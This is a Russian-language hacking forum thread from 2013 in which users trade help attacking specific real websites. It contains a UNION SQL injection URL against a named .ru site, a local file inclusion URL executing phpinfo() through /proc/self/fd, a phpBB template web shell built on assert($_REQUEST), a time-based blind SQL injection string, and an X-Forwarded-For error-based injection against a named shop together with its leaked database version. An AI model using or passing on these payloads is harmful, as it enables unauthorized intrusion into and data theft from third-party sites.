Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    578
    Likes Received:
    203
    Reputations:
    13
    Что случилось?
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    Если научится пользоваться поиском то найдем:
     
    _________________________
  3. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    То что во-первых это не LFI, во вторых мозг не должен ограничиваться /proc/self/environ
     
    _________________________
  4. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    578
    Likes Received:
    203
    Reputations:
    13
    Что это если не Local File Inclusion?

    Этот скрипт используется для подгрузки элементов страницы с помощью JavaScript. Каким еще макаром программист стал бы делать это, кроме как с помощью include() или require()?

    Кусок кода с главной страницы ресурса:
    HTML:
    loadPOPUP("load.php?index="+index+"&file=lib_current.popup.php", popup_id/*'popup'*/, index);
     
    #21704 herfleisch, 4 Jan 2013
    Last edited: 4 Jan 2013
  5. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    359
    Likes Received:
    178
    Reputations:
    108
    2 herfleisch

    Все же LFI. Вот код твоего файлика =)))

    PHP:
    <?php
    //загрузка файла из модуля
    if (!$_GET['binary'])
        
    header('Content-Type: text/html; charset=windows-1251');
    include 
    "config.ini.php";
    include_once 
    $CONFIG['path']['library']."lib.database.inc.php";
    include_once 
    $CONFIG['path']['library']."lib.modules.php";

    **
    закрытоцензурой**

    if (
    $_GET['file'])
        include_once 
    $_GET['file'];//загрузка файла
    ?>
     
    #21705 Cennarios, 4 Jan 2013
    Last edited: 4 Jan 2013
    3 people like this.
  6. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    578
    Likes Received:
    203
    Reputations:
    13
    В том что это LFI у меня сомнений не было, ибо
     
  7. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер уважаемые.
    Помогите раскрутить
     
  8. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://www.cnbest.ru/index.php?main=news&id=100116 and 0 union select 1,2,concat_ws(0x3a,user(),database(),version())-- -
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,022
    Likes Received:
    524
    Reputations:
    935
    Серьезно, это локальный инклюд. Моя ошибка.
    http://teyla.ru/load.php?file=/proc/self/fd/9&xx=phpinfo();
     
    _________________________
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    233
    Likes Received:
    47
    Reputations:
    20
    Люди, не могу залить шелл через шаблоны, включил Разрешить php в шаблонах: ДА
    Вставляю в шаблон faq_body.html такой код:
    <!-- PHP -->
    assert(stripslashes($_REQUEST[x]));
    <!-- ENDPHP -->
    0 Реакции.... Помогите плиз

    И вообще когда я удаляю все содержимое шаблона, а потом просматриваю ничего на форуме не изменяется...
    phpbb 3.0.10
     
  11. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    233
    Likes Received:
    47
    Reputations:
    20
    Не тот шаблон редактировал, спасибо :D
     
  12. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    233
    Likes Received:
    47
    Reputations:
    20
    Как можно автоматизировать sqli через X-Forwarded-For: ?
     
  13. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    208
    Likes Received:
    63
    Reputations:
    34
    помогите найти ман по time based sql inj или покажите как крутить на примере http://www.exploit-db.com/exploits/18618/
    буду рад любой помощи
    вроде понял
     
    #21713 wkar, 6 Jan 2013
    Last edited: 6 Jan 2013
  14. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    578
    Likes Received:
    203
    Reputations:
    13
    Какой-нибудь плагин вроде tamper data.
     
  15. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    208
    Likes Received:
    63
    Reputations:
    34
    Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.
     
  16. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    327
    Likes Received:
    46
    Reputations:
    11
    чем вас не устраивает sqlmap?!
     
  17. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    208
    Likes Received:
    63
    Reputations:
    34
    слишком крутая прога для меня :)
    по сути я не знаю как засунуть в нее скуль такого типа:
    .ru/index.php/404' AND IF((SELECT ascii(substr(table_name,1,1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)<200, sleep(2), null)-- '1
    чтоб она подбирала названия таблиц и т.д.
     
  18. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    233
    Likes Received:
    47
    Reputations:
    20
    Может знает кто как раскрутить
    Code:
    GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
    Host: www.3ona51.com
    X-Forwarded-For: "
     
  19. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    374
    Likes Received:
    343
    Reputations:
    99
    PHP:
    GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
    Host
    www.3ona51.com
    X
    -Forwarded-For: 127.0.0.1", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version(),rand(0)|0)x from information_schema.tables group by x)a)#
    MySQL[1062]: Duplicate entry '5.5.13' for key 'group_key'
     
    #21719 cat1vo, 6 Jan 2013
    Last edited: 6 Jan 2013
    2 people like this.
  20. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23
    как првильно вставить в скрипт данные, чтобы получить такой результат?
    <?php
    echo '<b>IP:</b> ' . $_SERVER[REMOTE_ADDR].
    '<br/><b>User-Agent:</b> ' . $_SERVER['HTTP_USER_AGENT'].
    '<br/><b>X-Forwarded-For:</b> ' . $_SERVER['HTTP_X_FORWARDED_FOR'].
    '<br/><b>X-Forwarded:</b> ' . $_SERVER['HTTP_X_FORWARDED'].
    '<br/><b>Forwarded-for:</b> ' . $_SERVER['HTTP_FORWARDED_FOR'].
    '<br/><b>Forwarded:</b> ' . $_SERVER['HTTP_FORWARDED'].
    '<br/><b>Via:</b> ' . $_SERVER['HTTP_VIA'].
    '';

    echo "<h2>All headers</h2>";
    echo "<pre>";
    print_r($_SERVER);
    echo "</pre>";
    ?>
     
Thread Status:
Not open for further replies.